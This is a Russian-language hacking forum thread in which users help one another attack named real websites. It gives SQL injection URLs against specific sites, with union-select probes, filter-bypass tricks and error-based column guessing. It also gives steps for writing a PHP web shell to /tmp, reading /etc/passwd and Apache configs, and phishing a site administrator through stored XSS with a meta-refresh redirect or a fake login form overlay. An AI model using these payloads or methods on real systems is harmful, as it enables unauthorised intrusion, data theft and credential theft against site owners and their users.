Я не обратил внимание, думал ты за окончание скуля говорил. Спс тебе за всё, очень помог, я много понял благодаря тебе.
линк не могу дать пока Я так понял, если выводить существующую колонку из существующей базы то просто загружается страница сайта, а если фейковую то ошибка invalid column name и т.п
значит я что-то путаю. или чего-то не знаю. Есть еще вопрос. Пользователь базы - root, почему не записываются файлы с шеллом? (перекодировал код пхп в хекс) Папки с кешом не найти, пхпмайадмин тоже хз где?
Altermannn http://www.dance4you.ru/teachers/info/data/ic_6/381'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/**/ Чёто я не пойму по моему эт не инъекция! Нжна помощь?
geforce походу фильтрует + но странно вывода помоему ваще нету.. или я неправильно составляю запрос.. а кавычку там не нужно сюдя по запросу.. Basilio посмотри если есть права.. попробуй лоад файл сначало... потом если есть права пробуй сначало успешно залить в /tmp/shell.php потом прочитать его.. если все ок.. читай конфиг апача там где виртуал хостс бери пути... можеш еще прикинуть пути через /etc/passwd
там чпу все карты путает, просто входные даные не проходят urldecode и пробел %20 и + остаються как они есть без преобразования, /**/ такую конструкцию не проведешь т.к. htacess по всей видимости как то преобразует запрос, короче если бы браузер не преобразовал просто пробел в %20 то запрос такой(cсудя по гвери 7 колонок выбераеться): -381 union select 1,2,3,4,5,6,7-- Нужно что то использовать вместо пробелов
%0D,%2B,%09,%0A,%20,+,%2B,/**/,$IFS прокатит только прямое обращение к скрипту?ic_6=381/**/... Basilio, 1. права mysql.user 2. права субд (юзверя под которым запущен процесс) Octave_Parangop, да _bethinking.org/resource.php?ID=233'+order+by+99--+
Сори! Не увидел! он это запрос к базе! Фильтруется /*! 1. там закрыт доступ к Code: http://www.bethinking.org/resource.php?ID=233'+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,AES_DECRYPT(AES_ENCRYPT(table_name,1),1),18,19+from+information_schema.tables--+ пишет: Access denied for user 'uccfapologist'@'server1.uccf.org.uk' to database 'information_schema' Как тогда посмотреть содерживое скулы только на угад?
Там 4 ветка ) http://www.bethinking.org/resource.php?ID=233'+union+select+1,UNHEX(HEX(version())),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19--+
Code: http://www.aperitif.no/?id=13' редирект Code: http://www.aperitif.no/?id=13+order+by+3-- главная страница + ошибки вывод сделать не получается, все время редирект
Есть такой вопрос,вопшем я нашел активную хсс,вот только дело в том что я тому админу которому на ету страницу зову,то он с телефона! а яваскрипт то там неработает,что можно придумать?????плиз,скорее....((
Можно редиректнуть его на фейк через META refresh Code: <meta http-equiv="refresh" content="0;url=http://урл_фейка/" /> или можно попробовать стилями (CSS) спрятать поле куда логин пароль вводится и отпозиционировать туда свою форму с вводом логина-пароля и другим action (ну и всё указывающее на то что он уже залогинен тоже спрятать). Хотя это муторно и не факт, что реализуемо на практике, но просто идея (Зато без скриптов )
Ты хоть сам понял что написал? вопше хсс в основе не определенной странице,и точно что не на вводе логина и пасса,и думаешь ето АДМИНУ ЕТОГО САЙТА будет так беспотпально то что я сделаю?...
не согласен, давай проведем маленький экспиремент, и так смотри, я буду основываться на показываемой ошибке как конечном результате, и так смотрем гверю: http://www.dance4you.ru/teachers/info/data/ic_6/-381' и так судя по всему 7 колонок выбераеться, и так вызываем ошибку и пробуем посмотреть http://www.dance4you.ru/teachers/info/data/ic_6/-381'/**/union/**/select/**/1,2,3,4,5,6,7,2,3,4,5,6-- и имеем в ответ SELECT A.id, A.parent_id, UNIX_TIMESTAMP(A.cdate) as cdate, UNIX_TIMESTAMP(A.mdate) as mdate, A.ip, B.var, B.data FROM sapi_tree A, sapi_data B WHERE A.id=B.parent_id AND A.id=-381' то есть кавычка прошла а все остольное нет и что бы в это убедиться смотрем так http://www.dance4you.ru/teachers/info/data/ic_6/-381'+union+select/**/1,2,3,4,5,6,7,2,3,4,5,6-- SELECT A.id, A.parent_id, UNIX_TIMESTAMP(A.cdate) as cdate, UNIX_TIMESTAMP(A.mdate) as mdate, A.ip, B.var, B.data FROM sapi_tree A, sapi_data B WHERE A.id=B.parent_id AND A.id=-381'+union+select то все что до /**/ проходит в переменую и вставляеться в гверю а все остольное нет, по все видимости в .htacess ишет значения переменой именно между / / и вставляет ее в запрос, сорее всего,как написал l1ght, только прямое обрашения к скрипту даст какой то результат.
